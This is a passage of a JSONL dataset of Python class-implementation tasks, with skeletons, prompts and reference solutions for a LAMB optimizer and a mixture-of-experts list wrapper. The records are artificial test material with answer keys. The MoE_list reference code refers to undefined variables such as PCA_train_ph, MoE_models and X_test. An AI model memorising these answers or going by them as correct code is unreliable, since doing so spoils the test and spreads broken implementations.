cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n", "source": "the_stack_v2_python_sparse", "source_path": "deploy_python/openem/models.py", "source_repo": "bryan-flywire/openem", "split": "test", "star_events_count": 0} {"blob_id": "899813d6c430bada0e3e38b84264c07ff6d6cb91", "bodies": ["super(LAMBOptimizer_v2, self).__init__(False, name)\nself.learning_rate = learning_rate\nself.weight_decay_rate = weight_decay_rate\nself.beta_1 = beta_1\nself.beta_2 = beta_2\nself.epsilon = epsilon\nself.exclude_from_weight_decay = exclude_from_weight_decay\nself.include_in_weight_decay = include_in_weight_decay\nif exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\nelse:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay", "assignments = []\nif learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\nelse:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\nfor grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\nreturn tf.group(*assignments, name=name)", "if not self.weight_decay_rate:\n return False\nif self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\nif self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\nreturn True", "if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\nreturn True", "m = re.match('^(.*):\\\\d+$', param_name)\nif m is not None:\n param_name = m.group(1)\nreturn param_name"], "bodies_text": "<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "class_docstring": "LAMB (Layer-wise Adaptive Moments optimizer for Batch training).", "class_name": "LAMBOptimizer_v2", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000331", "length_bytes": 25398, "license_type": "permissive", "methods": [{"docstring": "Constructs a LAMBOptimizer.", "name": "__init__", "signature": "def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer')"}, {"docstring": "See base class.", "name": "apply_gradients", "signature": "def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None)"}, {"docstring": "Whether to use L2 weight decay for `param_name`.", "name": "_do_use_weight_decay", "signature": "def _do_use_weight_decay(self, param_name)"}, {"docstring": "Whether to do layer-wise learning rate adaptation for `param_name`.", "name": "_do_layer_adaptation", "signature": "def _do_layer_adaptation(self, param_name)"}, {"docstring": "Get the variable name from the tensor name.", "name": "_get_variable_name", "signature": "def _get_variable_name(self, param_name)"}], "n_methods": 5, "prompt": "Implement the Python class `LAMBOptimizer_v2` described below.\n\nClass description:\nLAMB (Layer-wise Adaptive Moments optimizer for Batch training).\n\nMethod signatures and docstrings:\n- def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'): Constructs a LAMBOptimizer.\n- def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None): See base class.\n- def _do_use_weight_decay(self, param_name): Whether to use L2 weight decay for `param_name`.\n- def _do_layer_adaptation(self, param_name): Whether to do layer-wise learning rate adaptation for `param_name`.\n- def _get_variable_name(self, param_name): Get the variable name from the tensor name.", "prompted_full_text": "Implement the Python class `LAMBOptimizer_v2` described below.\n\nClass description:\nLAMB (Layer-wise Adaptive Moments optimizer for Batch training).\n\nMethod signatures and docstrings:\n- def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'): Constructs a LAMBOptimizer.\n- def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None): See base class.\n- def _do_use_weight_decay(self, param_name): Whether to use L2 weight decay for `param_name`.\n- def _do_layer_adaptation(self, param_name): Whether to do layer-wise learning rate adaptation for `param_name`.\n- def _get_variable_name(self, param_name): Get the variable name from the tensor name.\n\n<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "revision_id": "480c909e0835a455606e829310ff949c9dd23549", "skeleton": "<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n", "source": "the_stack_v2_python_sparse", "source_path": "t2t_bert/optimizer/optimizer_utils.py", "source_repo": "yyht/BERT", "split": "test", "star_events_count": 37} {"blob_id": "2d963f97e1d156da99ddb4473f36552dae6ae79b", "bodies": ["self.K = K\nif folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\nelse:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\nreturn", "file_list = os.listdir(folder)\nD_list = []\nfor k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\nassert len(set(D_list)) == 1\nself.D = D_list[0]\nreturn", "for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\nreturn", "if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\nassert y_train.shape[1] == self.K\nassert X_train.shape[0] == y_train.shape[0]\nassert X.shape[1] == self.D\nfor k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\nreturn", "if k_list is None:\n k_list = range(self.K)\nreturn self.MoE_list[k]", "assert X.shape[1] == self.D\ny = np.zeros((X_test.shape[0], self.K))\nfor k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\nreturn y"], "bodies_text": "<|body_start_0|>\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n<|end_body_0|>\n\n<|body_start_1|>\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n<|end_body_3|>\n\n<|body_start_4|>\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n<|end_body_4|>\n\n<|body_start_5|>\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n<|end_body_5|>\n", "class_docstring": "This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.", "class_name": "MoE_list", "detected_licenses": ["CC-BY-4.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MoE_list:\n \"\"\"This class contains a list of MoE models and deals with them easily. This might be useful for multidimensional regression where each target dimension is fitted separately by a MoE model. All models must have same input space dimensionality; they shall have same gating function model but might have different experts number. It takes care also of boring part of saving model to file.\"\"\"\n\n def __init__(self, K, folder=None, D=1, N_exp_list=10):\n \"\"\"Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)\"\"\"\n <|body_0|>\n\n def load(self, folder, load_function=None):\n \"\"\"Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)\"\"\"\n <|body_1|>\n\n def save(self, folder):\n \"\"\"Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to\"\"\"\n <|body_2|>\n\n def fit(self, X_train, y_train, args_list=None):\n \"\"\"Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be of form (N_iter, threshold, args, verbose) If only one tuple is given, it is used for each fitting procedure\"\"\"\n <|body_3|>\n\n def models(self, k_list=None):\n \"\"\"Returns the MoE model(s). Input: k_list [] index(indices) of the model to be returned (if None all models are returned) Output: models [] list of models to be returned\"\"\"\n <|body_4|>\n\n def predict(self, X):\n \"\"\"Makes predictions for all the models. Input: X (N,D) points to make predictions at Ouput: y (N,K) prediction for each MoE model\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.K = K\n if folder is not None:\n self.MoE_list = [None for k in range(K)]\n self.load(folder)\n else:\n if type(N_exp_list) is int:\n N_exp_list = [N_exp_list for k in range(self.K)]\n if len(N_exp_list) != self.K:\n raise TypeError(\"Lenght of number of expters list doesn't match number of models!\")\n self.D = D\n for k in range(self.K):\n self.MoE_list.append(MoE_model(self.D, N_exp_list[k]))\n return\n<|end_body_0|>\n\n<|body_start_1|>\n file_list = os.listdir(folder)\n D_list = []\n for k in range(self.K):\n if 'gat_' + str(k) not in file_list or 'exp_' + str(k) not in file_list:\n raise RuntimeError(\"Couldn't find proper files for MoE model \" + str(k))\n self.MoE_list[k] = MoE_model(self.D, 1)\n self.MoE_list[k].load(folder + 'exp_' + str(k), folder + 'gat_' + str(k), load_function=load_function)\n D, N_exp = MoE_list[k].get_iperparams()\n D_list.append(D)\n self.N_exp_list[k] = N_exp\n assert len(set(D_list)) == 1\n self.D = D_list[0]\n return\n<|end_body_1|>\n\n<|body_start_2|>\n for k in range(self.K):\n self.MoE_list[k].save(folder + 'exp_' + str(k), folder + 'gat_' + str(k))\n return\n<|end_body_2|>\n\n<|body_start_3|>\n if type(arg_list) is tuple:\n arg_list = [arg_list for k in range(self.K)]\n assert y_train.shape[1] == self.K\n assert X_train.shape[0] == y_train.shape[0]\n assert X.shape[1] == self.D\n for k in range(self.K):\n print('Fitting component ', k)\n y_train = PCA_train_ph[:, k]\n MoE_models[k].fit(train_theta, y_train, *arg_list[k])\n return\n<|end_body_3|>\n\n<|body_start_4|>\n if k_list is None:\n k_list = range(self.K)\n return self.MoE_list[k]\n<|end_body_4|>\n\n<|body_start_5|>\n assert X.shape[1] == self.D\n y = np.zeros((X_test.shape[0], self.K))\n for k in range(self.K):\n y[:, k] = self.MoE_list[k].predict(X)\n return y\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000332", "length_bytes": 4450, "license_type": "permissive", "methods": [{"docstring": "Initialise class. If folder is given, model is loaded from folder. Otherwise a softmax gating function model is built with the required dimensionality and number of experts. Input: K number of MoE models in MoE_list folder folder at which the model should be loaded from. (If None, nothing is loaded) The following not required if folder is None: D dimensionality of input space N_exp_list list holding the number of expert to use for each model (if int all N_exp are the same)", "name": "__init__", "signature": "def __init__(self, K, folder=None, D=1, N_exp_list=10)"}, {"docstring": "Load models from file. Folder must contain files of the following type: exp_# gat_# where # is in {0,..,K-1} Each model is the built from files given. Input: folder path to folder in which model is stored load_function function that shall be used to load the gating model. (if None default softmax is used)", "name": "load", "signature": "def load(self, folder, load_function=None)"}, {"docstring": "Saves all the models to the same folder. Files are: exp_# gat_# where # is in {0,..,K-1}. Input: folder name of the folder to save files to", "name": "save", "signature": "def save(self, folder)"}, {"docstring": "Fit for the k-th model the regression X -> y[k] k = 0,1,.. K. Each fit can have its own arguments [N_iter=None, threshold = 1e-2, args= [], verbose = False] Input: X_train (N,D) training data y_train (N,K) training targets args_list [] list of tuples of arguments to be given to each call of function MoE_model.fit Each tuple must be 